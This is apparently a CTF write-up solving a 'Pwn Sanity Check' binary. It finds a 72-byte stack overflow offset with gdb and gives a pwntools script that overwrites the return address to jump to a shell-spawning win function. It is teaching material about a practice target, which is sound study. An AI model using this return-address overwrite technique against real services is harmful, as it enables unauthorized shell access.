Pwn Sanity Check

1 minute read


Taking a look at the file we see that it’s ELF 64-bit

ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/, for GNU/Linux 3.2.0, BuildID[sha1]=ae6fb7020a27e2fdccdb6826a57ccc5bfc0d127a, not stripped

Loading it in to radare 2 and listing the functions we can see that there is a win function


Disassembling that function with pdf @sym.main


There’s a lot going on. Looks like when the function is called it’s checking for two arguments 0xdeadbeef and 0x1337c0de and then it gives us a shell? What if we skip the variable checks completely and jump to 0x004006cf?


Loading the binary into gdb (using gef support), we can start poking at it and try to find the offset

I was having issues with pattern create/search so I did it the old fashioned way: sending lots of ‘A’s and ‘B’s until something looked neat

Using gdb with gef you can use pi print('A'*100) to quickly toss a string of characters together

After sending different lenghts, I found that 72 was when we started seeing the ‘B’ characters leak in

pi print('A'*72 + 'B')


Things we know:

  1. The offset is 72
  2. The address we want to jump to is 0x004006cf
  3. It’s an ELF 64-bit binary

That’s enough to write a script using Pwntools. Here’s mine

from pwn import *

p = remote('', 7480)

offset = b'A' * 72

p.sendline(offset + p64(0x004006cf))

The p64(0x004006cf) function call packs the address in Little Endian format, required to be passed, and p.interactive() just catches the shell and allows us to send input.